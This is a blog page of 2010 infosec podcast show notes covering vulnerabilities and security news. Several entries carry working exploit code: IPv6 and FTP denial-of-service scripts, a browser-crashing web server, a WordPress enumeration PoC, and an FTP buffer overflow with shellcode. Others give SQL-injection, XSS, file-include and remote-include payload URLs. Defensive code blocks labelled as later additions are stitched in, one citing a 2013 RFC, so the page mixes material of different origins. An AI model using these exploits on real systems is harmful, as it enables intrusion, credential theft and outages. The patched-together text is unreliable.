2010
02.26

InfoSec Daily Podcast

 
ISD Podcast Episode 76 for February 26, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information-security news, hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

OuterZ0ne:

  • Outerz0ne March 19th and 20th near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
  • Starts early Saturday morning at the Wellesley Inn Atlanta Airport Hotel (http://www.wellesleyinnatlanta.com), 1377 Virginia Avenue, Atlanta, GA 30344, (404) 762-5111
  • The next DC404 meeting will be at Outerz0ne

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs, GA starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538).

Friends of the Podcast:
Webhosting services: WebSpeedway

Vulnerabilities of Interest:

  1. The Microsoft Windows TCP/IP ICMPv6 Router protocol implementation is subject to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions. The following commands using the Scapy6 packet manipulation program can trigger this issue and cause a denial-of-service condition:

    v6_dst = "<IPv6 address>"
    mac_dst = "<Mac address>"

    # Router Advertisement carrying an oversized Prefix Information option, sent as fragments
    pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load="A" * 2008)

    l = fragment6(pkt, 1500)

    for p in l:
        sendp(Ether(dst=mac_dst) / p, iface="eth0")

  2. GNU Libtool is subject to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will result in the complete compromise of affected computers. Versions prior to Libtool 2.2.6b are vulnerable. An attacker can exploit this issue by enticing an unsuspecting administrator to run ‘libtool’ from the directory where a malicious module is stored.
  3. The APC Network Management Card is subject to multiple cross-site request-forgery and cross-site scripting vulnerabilities. An attacker can exploit the cross-site request forgery issues to alter the settings on affected devices, which may lead to further network-based attacks. The attacker can exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible. Versions prior to the following are vulnerable:
    Network Management Card Firmware 3.7.2 and Network Management Card Firmware 5.1.1. To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URL: http://www.sample.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
  4. WorkSimple is subject to a shell-upload and a password-disclosure vulnerability. Version 1.3.2 is vulnerable, though other versions may be as well. Exploit code is available:
    Password disclosure vulnerability:

    http://www.sample.com/Path/data/secret.php

    Remote file upload vulnerability:
    file: /modules/uploader.php?startupload
    array(".phps", ".txt", ".html", ".png", ".html", ".htm", ".jpg", ".png",
          ".bmp", ".c", ".cpp", ".css", ".h", ".gif", ".torrent", ".jpeg");

    <form enctype='multipart/form-data'
          action='[SITE]/modules/uploader.php?startupload' method='post'>
    <input type='hidden' name='MAX_FILE_SIZE' value='500000' />
    Upload a file: <input name='uploadedfile' size='14' type='file' />
    <BR><BR>
    <input class='button' type='submit' value='upload' />
    </form>
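
The Router Advertisement packet in item 1 above is built with an option length field of 255 where RFC 4861 fixes the Prefix Information option at 4 (32 octets). The following parser is an added example, not code from the podcast or from the advisory; it walks the TLV options of an RA message in pure Python and reports the framing violations a receiving stack should refuse (zero-length options, options that overrun the message, and fixed-size options with the wrong length). The RA and option builders produce constructed sample packets with the checksum left at zero; the only assumption beyond the RFC layouts is that the caller hands in the ICMPv6 payload with the IPv6 header already stripped.

```python
import struct

# ICMPv6 / Neighbor Discovery constants from RFC 4443 and RFC 4861.
ICMPV6_ROUTER_ADVERTISEMENT = 134
OPT_PREFIX_INFORMATION = 3
OPT_MTU = 5
RA_HEADER_LEN = 16  # type, code, checksum, hop limit, flags, lifetime, reachable, retrans

# Option lengths (in 8-octet units) that RFC 4861 fixes for specific option types.
FIXED_OPTION_LENGTHS = {OPT_PREFIX_INFORMATION: 4, OPT_MTU: 1}


def parse_ra_options(icmp_payload):
    """Walk the TLV options of a Router Advertisement message.

    Returns (options, problems): options is a list of (type, length, data)
    tuples for every option that framed correctly; problems is a list of
    strings describing each violation of the RFC 4861 framing rules.
    Parsing stops at the first error that makes further framing unreliable.
    """
    options, problems = [], []
    if len(icmp_payload) < RA_HEADER_LEN:
        return options, ["truncated RA header (%d bytes)" % len(icmp_payload)]
    if icmp_payload[0] != ICMPV6_ROUTER_ADVERTISEMENT:
        return options, ["not a Router Advertisement (ICMPv6 type %d)" % icmp_payload[0]]

    offset = RA_HEADER_LEN
    remaining = len(icmp_payload) - offset
    while remaining > 0:
        if remaining < 2:
            problems.append("dangling byte after last option")
            break
        opt_type, opt_len = icmp_payload[offset], icmp_payload[offset + 1]
        if opt_len == 0:
            # RFC 4861 section 4.6: a zero-length option means the packet MUST be discarded.
            problems.append("option type %d has length 0" % opt_type)
            break
        total = opt_len * 8
        if total > remaining:
            problems.append("option type %d declares %d octets but only %d remain"
                            % (opt_type, total, remaining))
            break
        expected = FIXED_OPTION_LENGTHS.get(opt_type)
        if expected is not None and opt_len != expected:
            problems.append("option type %d has length %d, expected %d"
                            % (opt_type, opt_len, expected))
        options.append((opt_type, opt_len, icmp_payload[offset + 2:offset + total]))
        offset += total
        remaining -= total
    return options, problems


def build_ra(options_bytes=b""):
    """Constructed sample: a minimal RA header (checksum left as zero) plus raw options."""
    header = struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERTISEMENT, 0, 0, 64, 0, 1800, 0, 0)
    return header + options_bytes


def build_prefix_info(opt_len, padding=b""):
    """Constructed sample Prefix Information option for 2001::/64.

    A conforming option has opt_len == 4 (32 octets); opt_len=255 with 2008
    bytes of padding reproduces the shape of the packet in the advisory.
    """
    prefix = bytes.fromhex("20010000000000000000000000000000")
    body = struct.pack("!BBIII", 64, 0xC0, 2592000, 604800, 0) + prefix + padding
    return bytes([OPT_PREFIX_INFORMATION, opt_len]) + body


if __name__ == "__main__":
    for label, pkt in (("conforming", build_ra(build_prefix_info(4))),
                       ("advisory shape", build_ra(build_prefix_info(255, b"A" * 2008)))):
        opts, probs = parse_ra_options(pkt)
        print(label, len(opts), "option(s);", probs or "no problems")
```

Note that the packet in item 1 also arrives behind a Fragment extension header; RFC 6980 (published later, in 2013) requires hosts to drop Neighbor Discovery messages that are fragmented at all, which removes this class of reassembly-time parsing from the attack surface entirely.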

Stories of Interest:
News item 1: http://www.technologyreview.com/computing/24632/?a=f
Researchers at SRI International and Georgia Tech are preparing to release a free tool to stop “drive-by” downloads: Internet attacks in which the mere act of visiting a Web site results in the surreptitious installation of malicious software. The new tool, called BLADE (Block All Drive-By Download Exploits), stops downloads that are initiated without the user’s consent.

In the fourth quarter of 2009, roughly 5.5 million Web pages contained software designed to foist unwanted installs on visitors, according to Dasient, a firm that helps protect websites from Web-based malware attacks. Such drive-by downloads target computers that are not up-to-date with the latest security patches for common Web browser vulnerabilities, or are missing security updates for key browser plug-ins, such as Adobe’s PDF Reader and Flash Player. Attackers use software called exploit packs, which probe the visitor’s browser for known security holes.
The research group has been putting BLADE through the paces since January, exposing a few virtual desktops equipped with the software to new exploit sites identified each day by security experts. Each malicious URL is tested against multiple software configurations covering different browser versions and common plug-ins.

News item 2: http://sanfrancisco.bizjournals.com/sanfrancisco/stories/2010/02/22/daily2.html

VeriSign Inc. said 11 million new domain names were registered in the fourth quarter of 2009, pushing the total number to 192 million at year’s end. At the end of the third quarter, there were 187 million registered domain names. That was up from 177 million at the end of 2008. That works out to about 3.7 million new registrations per month in the fourth quarter, the Mountain View business, which tracks such things, said. New registrations for the .com and .net domains were about 2.4 million per month in the fourth quarter.

The renewal rate in the fourth quarter was 71 percent, about the same as it was in the fourth quarter of 2008. At the end of 2009, domain name registrations were up 15 million from the end of 2008.

News item 3: http://www.virusbtn.com/news/2010/02_22.xml
Despite widespread calls to boycott IE 6 and Microsoft’s plans to retire support for the browser, 19% of respondents in a Virus Bulletin poll said that they are still running the browser, whether at home, at work, or both. In VB’s poll, 15% of respondents said they were running the browser at work, indicating that, for many organizations, upgrading is not a priority.
http://www.virusbtn.com/news/polls/index?id=43

Are you still running IE 6? (February 2010)

  • Yes, on my machine at work: 12%
  • Yes, on my home machine: 4%
  • Yes, on both work and home machines: 3%
  • No, I use a newer version of IE: 26%
  • No, I use a different browser: 55%

News item 4: http://www.krebsonsecurity.com/2010/02/n-y-firm-faces-bankruptcy-from-164000-e-banking-loss/
A New York marketing firm that as recently as two weeks ago was preparing to be acquired now is facing bankruptcy from a computer virus infection that cost the company more than $164,000.

Karen McCarthy, owner of Merrick, N.Y. based Little & King LLC, a small promotions company, discovered on Monday, Feb. 15 that her firm’s bank account had been emptied the previous Friday. McCarthy said she immediately called her bank – Cherry Hill, N.J. based TD Bank – and learned that between Feb. 10 and Feb. 12, unknown thieves had made five wire transfers out of the account to two individuals and two companies with whom the McCarthys had never had any prior business.

“She was told to go to the branch next day, and she did, and the people at the branch were very nice, apologetic, and said, ‘Whatever happened, we’ll replace it,’” Karen McCarthy’s husband Craig said. “She called them up on Wednesday, and they gave her the runaround. Then she finally got to talk to someone and they said ‘We don’t see the error on our side.’”

Immediately before the fraud occurred, Mrs. McCarthy found that her Windows PC would no longer boot, and that the computer complained it could not find vital operating system files. “She was using it one day and then this blue screen of death just came on her screen,” said a longtime friend who was helping McCarthy triage her computer.

Later, McCarthy’s friend would confirm that her system had been infected with the ZeuS Trojan, a potent family of malware that steals passwords and lets cyber thieves control the infected host from afar. ZeuS also includes a feature called “kill operating system,” which criminals have used in prior bank heists to effectively keep the victim offline and buy themselves time to make off with the cash.

News item 5: http://www.myanmarnews.net/story/605416
A Latvian computer hacker has been leaking secret bank details to a local TV station. In Riga, data about the finances of banks and state-owned firms has been shown on Latvian TV, thanks to the hacker who uses the alias “Neo.” With Latvia suffering badly in the global recession, Neo has claimed he wants to expose those cashing in on the recession in Latvia, and has already revealed embarrassing pay details of bank managers and leading Latvian firms. So far, he has managed to leak the pay details of managers from one Latvian bank that received a bail-out, revealing they did not take salary cuts as promised. Other data shows that state-owned companies secretly awarded bonuses when still requesting help from the government. While police are now looking for the hacker, who has committed computer crime, the public appears to be generally on his side, as he continues to disclose embarrassing information.

News item 6:  http://blogs.technet.com/microsoft_blog/archive/2010/02/25/cracking-down-on-botnets.aspx

Waledac has been stopped in its tracks after Microsoft got a court to issue a secret temporary restraining order. The restraining order took 277 domain names used by the criminals to communicate with the botnet offline. Without these domain names, it is hoped that the controllers of the botnet will permanently lose access to the machines running their malware.

The Waledac botnet is presumed to be run by Eastern Europeans and to be made up of hundreds of thousands of compromised machines. It sends hundreds of millions, if not billions, of e-mails each day, as well as distributing malware to help recruit new machines to the network. Microsoft’s complaint describes in detail how the botnet is organized, with a complex hierarchical control system. At the root of the system are the command-and-control servers. The botnet uses the 277 domain names to connect to the command-and-control servers to download new commands. These commands are then distributed through the different tiers of the network using peer-to-peer transmission.

News item 7: http://www.computerworld.com/s/article/9162498/Researchers_question_Microsoft_s_botnet_take_down?source=rss_news

A prominent security researcher today said he doubts Microsoft’s take-down of the Waledac botnet would have any impact on spam levels, as the company claimed.

“Waledac just is not a hugely prolific spammer,” said Joe Stewart, director of malware analysis at SecureWorks and a noted botnet researcher. “So I don’t think it’s going to affect spam [volume]. What it does do lately…, what it’s used for, is to install rogue antivirus software.”

The U.K.-based anti-spam service Spamhaus echoed Stewart today. “If [Microsoft's take-down] did affect spam, we haven’t noticed,” said Richard Cox, the chief information officer at Spamhaus. Like Stewart, Cox also dismissed Waledac’s threat as a spam engine.

News item 8:  http://www.newsnet5.com/dpp/news/national/Copy_of_PATeen-Hacker_98726384

A 17-year-old honor student from western Pennsylvania has entered the equivalent of a guilty plea to four felony charges in juvenile court for using a computer virus to crash a Sony Entertainment Corp. gaming Web site.

The charges grew out of a federal grand jury investigation in San Diego, but authorities agreed to let the charges be handled by Westmoreland County Juvenile Court because of the boy’s age.

Police in Greensburg, Pa. said the boy used his computer skills to cripple Sony’s PlayStation site for 11 days in November 2008 after he was barred from it for cheating while playing a war game against others online.

News item 9:  http://www.wired.com/threatlevel/2010/02/military-spied-on-plannet-parenthood/

The U.S. military monitored Planned Parenthood and a white supremacist group as part of the government’s security preparations for the 2002 Olympics in Utah, according to new documents released by the Department of Defense.

The U.S. Joint Forces Command liaison collected and disseminated information on U.S. citizens who were members of Planned Parenthood and the white supremacist group National Alliance regarding their involvement in protests and distributing literature, according to an intelligence-oversight report released by the Pentagon. The documents indicate that the JFC liaison was working with the FBI’s Olympic Intelligence Center at the time.

This and other intelligence-activity disclosures appear in heavily redacted documents that were released to the Electronic Frontier Foundation. They came in response to an ongoing Freedom of Information Act project the organization is conducting to obtain oversight information from intelligence agencies.

EFF received more than 800 pages from intelligence oversight reports created by the Defense Department inspector general that examine actions, conducted by various branches of the department, that are believed to be illegal.
A document from a 2008 oversight report indicates that Army Cyber Counterintelligence officers attended a Black Hat security conference without disclosing their Army affiliation. The conference, held annually in Las Vegas and Washington, D.C., attracts hackers and security professionals from around the world. It’s also a hotbed gathering for undercover law enforcement and intelligence agents from around the world who come to learn about the latest computer security vulnerabilities and what specific hackers are up to. The documents don’t indicate if the officers collected any information on conference attendees.

News item 10: http://cellphones.org/privacy/

2010
02.25

InfoSec Daily Podcast

 
ISD Podcast Episode 75 for February 25, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information-security news, hopefully providing you a few laughs and a little knowledge.

Announcements:

Friends of the Podcast:
Webhosting services: WebSpeedway

Vulnerabilities of Interest:

  1. WebKit is subject to a remote memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. The following are vulnerable: Apple Safari 4.0.4, Apple Safari for the iPhone and iPod Touch and Google Chrome 4.0.249. Other versions of those browsers or other applications built using WebKit may also be affected.
    #!/usr/bin/python
    # greetz to my blackhatz and baycatz
    # iPhone CSS::Selector crash
    # this Python script acts as a web server and sends a malformed long string to the CSS <style> tag
    # this is a remote crash bug, however an analysis of the debug dump shows remote code execution capability, I am just lazy

    import sys, socket

    def main():
        junk = "*>" * 120000

        html = """
        <html>
        <head>
        <style>
        """

        html += junk

        html += """
        body {background: blue;}
        </style>
        </head>
        </html>
        """

        # Listen on TCP 2121 and answer every connection with the crafted page
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(('', 2121))
        s.listen(1)

        while True:
            channel, details = s.accept()
            print channel.recv(1024)
            channel.send(html)
            channel.close()

    main()

  2. OpenInferno OI.Blogs is subject to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. OpenInferno OI.Blogs 1.0.0 is vulnerable; other versions may also be affected. Example URLs are available:

    http://www.sample.com/templates/loadStyles.php?theme=file%00

    http://www.sample.com/sources/javascript/loadScripts.php?scripts=[file]%00

    The following example data is available:
    javascript:document.cookie="installerFile=[File];path='/upload/admin/plugins'"

  3. Softbiz Auktios is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example URLs are available:

    http://www.sample.com/auktionscript/view_items.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin

    http://www.sample.com/auktionscript/store_info.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3a,pwd),18+from+sbauctions_admin#

  4. EMC HomeBase Server is subject to a remote code-execution vulnerability because it fails to properly sanitize user-supplied data. An attacker can exploit this issue to overwrite arbitrary files and execute arbitrary code with the privileges of the service. Attackers can use standard tools to exploit this issue.
  5. SavySoda WiFiFTP is subject to a remote denial-of-service vulnerability. Successful exploits may allow an attacker to prevent users from accessing files on the FTP server, resulting in a denial-of-service condition. SavySoda WiFiFTP 1 is vulnerable; other versions may also be affected.
    #!/usr/bin/python
    #
    # Title: iPhone - FTP Server (WiFi FTP) by SavySoda DoS/PoC
    # Date: 02-18-2010
    # Author: b0telh0
    # Link: app store (http://itunes.apple.com/br/app/ftp-server/id346724641?mt=8)
    # Tested on: iPhone 3G (firmware 3.1.3)

    # The server doesn't crash at all, but after exploiting it
    # you can't see (list) your files anymore. You must close the app
    # and open it again. Then you'll see that the app starts like it was
    # freshly installed and your files are gone.

    # root@bt:~# ./free_ftp.py 192.168.1.108
    #
    # [+] iPhone – FTP Server by SavySoda(WiFi FTP).
    # [+] Free version of WiFi FTP with Ad Support.
    #
    # [+] Connecting…
    # [+] 220 Service ready.
    #
    # [+] Sending username…
    # [+] Sending buffer…
    # [+] done!

    # root@bt:~# ftp 192.168.1.108
    # Connected to 192.168.1.108.
    # 220 Service ready.
    # Name (192.168.1.108:root): anonymous
    # 230 User logged in, proceed.
    # Remote system type is UNIX.
    # Using binary mode to transfer files.
    # ftp> ls
    # 200 Command okay.
    # 450 Requested file action not taken. File unavailable (e.g., file busy).
    # ftp> ls
    # 421 Service not available, closing control connection.
    # ftp> ls
    # Not connected.
    # ftp> bye

    import socket
    import sys
    import time

    crash = "\x41" * 1000

    def Usage():
        print ("Usage: ./free_ftp.py serv_ip\n")

    if len(sys.argv) <> 2:
        Usage()
        sys.exit(1)
    else:
        host = sys.argv[1]

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print "\n[+] FTP Server by SavySoda(WiFi FTP)."
        print "[+] Free version of WiFi FTP with Ad Support.\n"
        print "[+] Connecting..."
        s.connect((host, 21))
        b = s.recv(1024)
        print "[+] " + b
    except:
        print ("[-] Can't connect to ftp server!\n")
        sys.exit(1)

    print "[+] Sending username..."
    time.sleep(3)
    s.send('USER anonymous\r\n')
    s.recv(1024)
    print "[+] Sending buffer..."
    time.sleep(3)
    s.send('APPE ' + crash + '\r\n')
    s.recv(1024)
    s.close()
    print "[+] done!\n"
    sys.exit(0)

  6. Squid Web Proxy Cache is subject to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. An attacker may use readily available networking tools to exploit this issue.
  7. WikyBlog is subject to multiple vulnerabilities, including an arbitrary-file-upload issue, a cross-site scripting issue, a remote file-include issue, and a session-fixation issue. Attackers can exploit these issues to run arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials; upload arbitrary PHP scripts and run them in the context of the webserver; compromise the application and the underlying system; and hijack a user’s session and gain unauthorized access to the affected application. WikyBlog 1.7.3rc2 is vulnerable; other versions may also be affected. Example URLs are available:
    File upload:
    http://www.sample.com/Wiky/index.php/Attach/(your name)?cmd=uploadform

    Cross-site scripting:

    http://www.sample.com/Wiky/index.php/Special/Main/Templates?cmd=copy&which=<img+src=http://www.example.com/HomeComputer.jpg+onload=alert(213771818860)>

    Session fixation:

    http://www.sample.com/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Comment/Main/Home_Wiky/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Edit/Main/;jsessionid=indoushkasessionfixation

    Remote file include:

    http://www.sample.com/Wiky/include/WBmap.php?langFile=http://www.example2.com/c.txt?
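
The Softbiz Auktios URLs in item 3 work because the id parameter is pasted straight into the SQL text, so "null union select ..." becomes part of the query. The following is an added example, not code from the podcast or from the product, showing the flawed pattern next to the hardened one against an in-memory SQLite database; the table and column names echo the advisory, the rows in them and the password are constructed sample data, and the payload is adapted to SQLite syntax (|| in place of concat()).

```python
import sqlite3


def make_demo_db():
    """Constructed in-memory stand-in for the auction database; all rows are sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items (id INTEGER, title TEXT);
        CREATE TABLE sbauctions_admin (admin_name TEXT, pwd TEXT);
        INSERT INTO items VALUES (1, 'Antique clock');
        INSERT INTO items VALUES (2, 'Road bike');
        INSERT INTO sbauctions_admin VALUES ('admin', 'sample-password');
    """)
    return db


def view_item_vulnerable(db, item_id):
    """Mirrors the flawed pattern: the request parameter is spliced into the SQL text."""
    sql = "SELECT id, title FROM items WHERE id = " + item_id
    return db.execute(sql).fetchall()


def view_item_safe(db, item_id):
    """Hardened form: validate the type, then bind the value as a parameter."""
    try:
        numeric_id = int(item_id)
    except (TypeError, ValueError):
        return []  # non-numeric id: reject it instead of trying to "sanitize" it
    return db.execute("SELECT id, title FROM items WHERE id = ?", (numeric_id,)).fetchall()


# The advisory's payload shape in SQLite syntax and for a two-column SELECT:
# 'null' matches no item, so only the UNIONed admin row comes back.
UNION_PAYLOAD = "null union select 1, admin_name || ':' || pwd from sbauctions_admin"

if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable:", view_item_vulnerable(db, UNION_PAYLOAD))
    print("safe:      ", view_item_safe(db, UNION_PAYLOAD))
```

With a bound parameter the database never parses the value as SQL, so the same string simply matches no row; the int() check on top of that is defence in depth and gives the application a clean place to log and reject malformed ids.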

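Items 2 and 7 above share one root cause: a request parameter (theme=, scripts=, langFile=) is used as a file name for an include, so a %00 truncates the name, ../ walks out of the template directory, and an http:// value pulls in a remote script. The function below is an added example, not code from the podcast or from either product, showing the checks a defender would put in front of such an include; the base directory, the extension allowlist and the theme table are constructed for the demonstration.

```python
import os
import re
from urllib.parse import unquote

# Anything that looks like a URL scheme (http:, ftp:, data:, php:) or a
# protocol-relative //host path is a remote-include attempt, not a local file.
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


def safe_include_path(base_dir, raw_value, allowed_ext=(".php", ".css", ".js")):
    """Map a user-supplied file name onto a path strictly inside base_dir.

    Returns the resolved absolute path, or None when the value must be rejected.
    Checks, in order: URL-decoding (so %00 is seen as a NUL byte), embedded NUL
    bytes, remote schemes, escape from base_dir via ../ or an absolute path
    (realpath also follows symlinks), and the file-extension allowlist.
    """
    if not isinstance(raw_value, str) or raw_value == "":
        return None
    value = unquote(raw_value)
    if "\x00" in value:
        return None
    if SCHEME_RE.match(value) or value.startswith("//") or value.startswith("\\\\"):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([base, candidate]) != base or candidate == base:
        return None
    if not candidate.lower().endswith(allowed_ext):
        return None
    return candidate


# Stronger still: when the set of loadable files is known up front, map
# names to files and never use the request value as a path at all.
THEMES = {"default": "default.css", "dark": "dark.css"}  # constructed allowlist


def resolve_theme(base_dir, name):
    file_name = THEMES.get(name)
    return None if file_name is None else os.path.join(base_dir, file_name)


if __name__ == "__main__":
    base = "/srv/app/templates"  # hypothetical install location
    for value in ("default.css", "file%00", "../../etc/passwd",
                  "http://www.example2.com/c.txt?"):
        print("%-32r -> %r" % (value, safe_include_path(base, value)))
```

The allowlist version is the one to prefer wherever the application already knows which files it may load; the path-validation version is for the cases where a genuinely user-chosen file name is unavoidable.
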
News Items of Interest:
News item 1: http://www.newsweek.com/id/233916

There is no doubt about the fact that real-time or historical tracking of criminals’ movements via their cell phones can come in really handy to law enforcement officers. It is certain that most of them – if not all – would like to avail themselves of this opportunity in order to gain helpful information to aid them in their investigations.
According to Newsweek, some of them have. Federal magistrates around the country were asked to sign off on warrants that would allow law enforcement agencies to use cellphones as tracking devices. But, some magistrates in New York, Pennsylvania, and Texas haven’t been that forthcoming and refused to sign such requests, not being convinced about their legality.

http://cryptome.org/isp-spy/microsoft-spy.zip

News item 2: http://news.slashdot.org/story/10/02/21/2329249/Windows-7-Memory-Usage-Critic-Outed-As-Fraud
A few days ago, a report came out alleging that Windows 7 consumed more memory than it should, based on a report from Devil Mountain Software; a followup post linked to Ars Technica’s robust deconstruction of that claim. Now the story gets weird. Fred Flowers writes:
“The original story quoted the company’s CTO, Craig Barth, on the issue. Now, InfoWorld editor in chief Eric Knorr has still more to add. From Knorr’s blog at InfoWorld.com: ‘On Friday, Feb. 19, we discovered that one of our contributors, Randall C. Kennedy, had been misrepresenting himself to other media organizations as Craig Barth, CTO of Devil Mountain Software (aka exo.performance.network), in interviews for a number of stories regarding Windows and other Microsoft software topics. … There is no Craig Barth.’ Knorr’s post goes on to say that Kennedy has been fired from his blogging gig at InfoWorld over this ‘serious breach of trust,’ and that his blog will be removed.”

Technical Segment:
http://www.irongeek.com/i.php?page=security/zipit-z2-hacking-userland-side-track

2010
02.24

Episode 74 – iBoobs

InfoSec Daily Podcast

 
ISD Podcast Episode 74 for February 24, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information-security news, hopefully providing you a few laughs and a little knowledge.

Announcements:

Friends of the Podcast:
Webhosting services: WebSpeedway

Vulnerabilities of Interest:

  1. WordPress is subject to an information-disclosure vulnerability because it fails to properly restrict access to trashed posts. An attacker can exploit this vulnerability to view other authors’ trashed posts, which may aid in further attacks. Versions prior to WordPress 2.9.2 are vulnerable. The following exploit code is available:
    #!/usr/bin/python
    #
    # WordPress > 2.9 Failure to Restrict URL Access PoC
    #
    # This script iterates through the WP post IDs as an authenticated and unauthenticated user.
    # If the requests differ a 'Trash' post has been found.
    #
    # You will need an authenticated user cookie of any privilege to run this script.
    #
    # Example cookie:
    # wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
    #
    # Will only work with WP URLs with the '/?p={int}' parameter. Would need to handle redirects (3xx) to handle all URL types.
    #
    #
    # Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

    import httplib
    import sys

    # Declare vars
    blogURL = "www.example.com"
    userCookie = "enter_cookie_here"
    postID = 0  # Leave at 0

    conn = httplib.HTTPConnection(blogURL)
    Headers = {"Cookie": userCookie}

    print
    print "Target = http://" + blogURL + "/?p=" + str(postID)
    print

    while 1:

        # Start non authenticated enumeration

        request = '/?p=' + str(postID)
        conn.request("GET", request, "")

        try:
            r1 = conn.getresponse()
        except:
            print "Connection error"
            sys.exit(1)

        data1 = r1.read()

        # Start authenticated enumeration (same URL, with the session cookie)

        conn.request("GET", request, None, Headers)

        try:
            r2 = conn.getresponse()
        except:
            print "Connection error"
            sys.exit(1)

        data2 = r2.read()

        # Compare the HTML body responses

        if data1 != data2:
            print "+ Found! http://" + blogURL + request
        else:
            print request

        postID += 1

    conn.close()

  2. UplusFtp (formerly Easy Ftp Server) is subject to multiple remote buffer-overflow vulnerabilities. Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. UplusFtp 1.7.0.12 is vulnerable; prior versions, including Easy Ftp Server, may also be affected. Exploit code is available:
    #!/usr/bin/python

    # Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
    # From: The eh?-Team || The Great White Fuzz (we're not sure yet)
    # Author: dookie2000ca
    # Date: 14/02/2010
    # Found by: loneferret
    # Date Found: 13/02/2010

    # Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
    # Tested on: Windows XP SP3 Professional

    import socket
    import sys

    # msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a\x2f\x5c' -e x86/shikata_ga_nai -t c
    # [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)

    shellcode = ("\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93"
                 "\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f"
                 "\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04"
                 "\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb"
                 "\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e"
                 "\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6"
                 "\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21"
                 "\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11"
                 "\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a"
                 "\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5"
                 "\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21"
                 "\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69"
                 "\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36"
                 "\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5"
                 "\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b"
                 "\x1b\x35\x1d")

    sled = "\x90" * 10
    filler = "\x90" * 30
    eip = "\x8B\x38\xAB\x71"  # 71AB388B JMP EBP WS2_32.DLL
    trailer = "\x43" * 48

    evil = sled + shellcode + filler + eip + trailer

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.1.142', 21))
    s.recv(1024)
    s.send('USER dookie\r\n')
    s.recv(1024)
    s.send('PASS dookie\r\n')
